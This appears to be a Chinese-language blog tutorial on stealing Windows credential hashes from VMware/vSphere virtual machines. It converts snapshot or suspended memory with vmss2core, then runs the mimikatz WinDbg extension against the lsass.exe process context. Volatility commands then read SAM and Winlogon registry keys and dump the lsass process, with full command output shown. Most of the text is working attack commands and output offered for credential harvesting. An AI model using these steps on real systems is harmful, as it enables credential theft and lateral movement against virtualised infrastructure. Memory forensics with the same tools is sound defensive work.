VMware/VSphere Dump lsass.exe

通过获取虚拟机的内存页转储lsass.exe获取系统中的hash

准备工作

准备工作WindowsSDK,WindowsSDK中包含WinDbg.exe

vmss2core获取转储文件

https://kb.vmware.com/s/article/2003941?lang=zh_CN

  1. https://flings.vmware.com/vmss2core

    Visual C++ Redistributable Packages for Visual Studio 2013

    依赖环境https://www.microsoft.com/zh-CN/download/details.aspx?id=40784

    x64 x86

  2. 拍摄快照/暂停虚拟机

  3. vmss2core命令,linux/macos/windows/vsphere同理,可直接在远程服务器转储或下载回本地操作

    vmss2core.exe -W8 vmwarewin11.vmss vmwarewin11.vmem 暂停状态
    vmss2core.exe -W8 vmwarewin11-snap.vmsn vmwarewin11-snap.vmem 快照状态
    H:\VMs\Windows 11 x64>c:\Users\admin\Downloads\Programs\vmss2core-sb-8456865.exe -W8 "H:\VMs\Windows 11 x64\Windows 11 x64-39ba6684.vmss" "H:\VMs\Windows 11 x64\Windows 11 x64-39ba6684.vmem"
    vmss2core version 8456865 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
    region[0]: start=0 end=c0000000.
    region[1]: start=100000000 end=240000000.
    scanning pa=0 len=0x10000000
    scanning pa=0xfffffab len=0x10000000
    scanning pa=0x1fffff56 len=0x10000000
    scanning pa=0x2fffff01 len=0x10000000
    scanning pa=0x3ffffeac len=0x10000000
    scanning pa=0x4ffffe57 len=0x10000000
    scanning pa=0x5ffffe02 len=0x10000000
    scanning pa=0x6ffffdad len=0x10000000
    
  4. 获得转储文件memory.dmp

    Untitled

WinDbg

在WindowsSDK中获取WinDbg.exe,加载dmp文件

Untitled

等待加载完成

Untitled

# reload
0: kd> .symfix
0: kd> .reload
# 载入模块
0: kd> .load E:\mimikatz\x64\mimilib.dll

  .#####.   mimikatz 2.2.0 (x64) built on Aug 10 2021 02:01:09
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 22000
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

# 查找进程
0: kd> !process 0 0 lsass.exe
Unable to get program counter
PROCESS ffff8001d9b6f080
    SessionId: 0  Cid: 02e0    Peb: 56074ba000  ParentCid: 0248
    DirBase: a604b000  ObjectTable: ffff9807a25e1840  HandleCount: 1258.
    Image: lsass.exe

# 将进程转换至本机
0: kd> .process ffff8001d9b6f080

# mimikatz
0: kd> !mimikatz

Untitled

附:使用工具转换vmem文件

Windows系统在蓝屏瞬间系统会生成内存转储的扩展名为dmp的系统错误报告文件,保存为C:\Windows\MEMORY.DMP

moonsols_windows_memory_toolkit

文件来自于网络,请自行检查后门或至离线专用虚拟机运行,产生后果概不负责

moonsols_windows_memory_toolkit_community_edition.zip

  1. 暂停虚拟机,获取.vmem文件
  2. 第二步,转换
  3. https://raw.githubusercontent.com/arizvisa/windows-binary-tools/master/bin2dmp.exe

Untitled

volatility框架转储指定进程和基本信息获取(测试)

https://www.volatilityfoundation.org/releases

https://github.com/volatilityfoundation/volatility/wiki

http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip

需要python安装依赖

C:\Python27\python.exe -m pip install crypto pycryptodome distorm3
volatility.exe -f win11.vmem imageinfo #查看内存页信息
volatility -f mem.vmem --profile=WinXPSP2x86 printkey -K "SAM\Domains\Account\Users\Names" 获取用户

volatility -f mem.vmem --profile=WinXPSP2x86 printkey -K "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
volatility -f mem.vmem --profile=WinXPSP2x86 -p [PID] -D [dump 出的文件保存的目录]

windows2008R2

./volatility_2.6_lin64_standalone -f "/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem" imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80001a4c0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80001a4dd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-09-26 13:12:44 UTC+0000
     Image local date and time : 2021-09-26 21:12:44 +0800

./volatility_2.6_lin64_standalone -f "/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem" --profile=Win2008R2SP1x64

https://github.com/volatilityfoundation/volatility3

安装依赖

C:\Python39\python.exe -m pip install crypto pycryptodome yara-python pefile capstone

查看基本信息

PS C:\Users\admin\Desktop\python\volatility3> c:\Python39\python.exe vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.info
Volatility 3 Framework 1.2.1
Progress:  100.00               PDB scanning finished
Variable        Value

Kernel Base     0xf8000185b000
DTB     0x187000
Symbols file:///C:/Users/admin/Desktop/python/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3844DBB920174967BE7AA4A2C20430FA-2.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 FileLayer
KdDebuggerDataBlock     0xf80001a4c0a0
NTBuildLab      7601.17514.amd64fre.win7sp1_rtm.
CSDVersion      1
KdVersionBlock  0xf80001a4c068
Major/Minor     15.7601
MachineType     34404
KeNumberProcessors      4
SystemTime      2021-09-26 13:12:44
NtSystemRoot    C:\Windows
NtProductType   NtProductServer
NtMajorVersion  6
NtMinorVersion  1
PE MajorOperatingSystemVersion  6
PE MinorOperatingSystemVersion  1
PE Machine      34404
PE TimeDateStamp        Sat Nov 20 09:30:02 2010

查看进程

PS C:\Users\admin\Desktop\python\volatility3> C:\Python39\python.exe .\vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.psscan.PsScan
Volatility 3 Framework 1.2.1
Progress:  100.00               PDB scanning finished
PID     PPID    ImageFileName   Offset  Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

3228    3196    vcredist_x86.e  0xfd8058a0      1       -       -       True    2021-09-26 13:12:40.000000      N/A     Disabled
3408    508     msiexec.exe     0xfd86b060      7       -       -       False   2021-09-26 13:12:43.000000      N/A     Disabled
3460    1716    cmd.exe 0xfd8919e0      0       -       -       False   2021-09-26 13:12:44.000000      2021-09-26 13:12:44.000000      Disabled
3480    3460    ipconfig.exe    0xfd896b30      0       -       -       False   2021-09-26 13:12:44.000000      2021-09-26 13:12:44.000000      Disabled
2712    508     msdtc.exe       0xfda12950      15      -       -       False   2021-09-26 13:12:27.000000      N/A     Disabled
2884    508     taskhost.exe    0xfda648e0      9       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2468    508     VSSVC.exe       0xfdabc800      6       -       -       False   2021-09-26 13:12:30.000000      N/A     Disabled
3332    3252    VC_redist.x86.  0xfdb1ab30      8       -       -       True    2021-09-26 13:12:42.000000      N/A     Disabled
2260    2088    vmtoolsd.exe    0xfdb47060      9       -       -       False   2021-09-26 13:12:34.000000      N/A     Disabled
2160    2088    vm3dservice.ex  0xfdb55060      2       -       -       False   2021-09-26 13:12:34.000000      N/A     Disabled
2848    2248    setup.exe       0xfdb94b30      1       -       -       True    2021-09-26 13:12:36.000000      N/A     Disabled
3196    2848    setup64.exe     0xfdbb1b30      1       -       -       False   2021-09-26 13:12:39.000000      N/A     Disabled
3252    3228    vcredist_x86.e  0xfdbb7b30      8       -       -       True    2021-09-26 13:12:40.000000      N/A     Disabled
1968    508     SQLAGENT.EXE    0xfdc12790      16      -       -       False   2021-09-26 13:12:22.000000      N/A     Disabled
1232    348     conhost.exe     0xfdc3ab30      2       -       -       False   2021-09-26 13:12:23.000000      N/A     Disabled
2096    508     fdlauncher.exe  0xfdcb5780      4       -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2148    508     svchost.exe     0xfdcf9060      13      -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2196    508     svchost.exe     0xfdd03890      6       -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2320    628     rundll32.exe    0xfdd13060      6       -       -       False   2021-09-26 13:12:32.000000      N/A     Disabled
2612    628     rundll32.exe    0xfdd1cb30      6       -       -       False   2021-09-26 13:12:32.000000      N/A     Disabled
2656    628     WmiPrvSE.exe    0xfdd29670      9       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
2088    2988    explorer.exe    0xfdd4e060      26      -       -       False   2021-09-26 13:12:30.000000      N/A     Disabled
2988    456     userinit.exe    0xfdd599e0      3       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2516    2096    fdhost.exe      0xfdd67060      8       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
3004    944     dwm.exe 0xfdd9b520      3       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2544    508     dllhost.exe     0xfdda7560      18      -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
1088    508     spoolsv.exe     0xfde2fb30      15      -       -       False   2021-09-26 13:11:41.000000      N/A     Disabled
1156    508     MsDtsSrvr.exe   0xfde5d9d0      12      -       -       False   2021-09-26 13:11:41.000000      N/A     Disabled
1308    508     sqlservr.exe    0xfde8e480      49      -       -       False   2021-09-26 13:12:12.000000      N/A     Disabled
2412    508     dllhost.exe     0xfdea7630      24      -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
1428    508     mysqld.exe      0xfdecc060      23      -       -       False   2021-09-26 13:12:13.000000      N/A     Disabled
2248    1716    VMwareToolsUpg  0xfdedda20      2       -       -       True    2021-09-26 13:12:31.000000      N/A     Disabled
1464    508     svchost.exe     0xfdef5b30      4       -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1488    508     sqlwriter.exe   0xfdf017c0      7       -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1556    508     tomcat7.exe     0xfdf2d770      32      -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1564    348     conhost.exe     0xfdf35b30      3       -       -       False   2021-09-26 13:12:15.000000      N/A     Disabled
1620    508     VGAuthService.  0xfdf4a8e0      4       -       -       False   2021-09-26 13:12:15.000000      N/A     Disabled
1716    508     vmtoolsd.exe    0xfdf7a060      10      -       -       False   2021-09-26 13:12:17.000000      N/A     Disabled
508     408     services.exe    0xfe00c7d0      27      -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
516     408     lsass.exe       0xfe02a910      15      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
524     408     lsm.exe 0xfe02c850      13      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
340     508     svchost.exe     0xfe050b30      16      -       -       False   2021-09-26 13:11:40.000000      N/A     Disabled
628     508     svchost.exe     0xfe069060      20      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
800     508     svchost.exe     0xfe0ea060      19      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
844     508     svchost.exe     0xfe0fc060      52      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
900     508     svchost.exe     0xfe11b890      19      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
944     508     svchost.exe     0xfe1295f0      11      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
984     508     svchost.exe     0xfe14a5f0      28      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
2524    348     conhost.exe     0xfe36d630      1       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
400     392     csrss.exe       0xfe3c1b30      13      -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
408     340     wininit.exe     0xfe3c3b30      8       -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
456     392     winlogon.exe    0xfe3e8b30      5       -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
348     340     csrss.exe       0xfe5ecb30      9       -       -       False   2021-09-26 13:11:35.000000      N/A     Disabled
696     508     svchost.exe     0xff134060      12      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
252     4       smss.exe        0xff419b30      3       -       N/A     False   2021-09-26 13:11:32.000000      N/A     Disabled
1336    508     msmdsrv.exe     0xffd4c060      25      -       -       False   2021-09-26 13:12:13.000000      N/A     Disabled
4       0       System  0xffeae040      93      -       N/A     False   2021-09-26 13:11:32.000000      N/A     Disable
C:\Python39\python.exe .\vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.pslist.PsList --pid 516 --dump

后续再看一下hyper-V转储内存,国外使用hyper-v及存储池作为集群的情况非常常见

参考链接:

https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/

comments powered by Disqus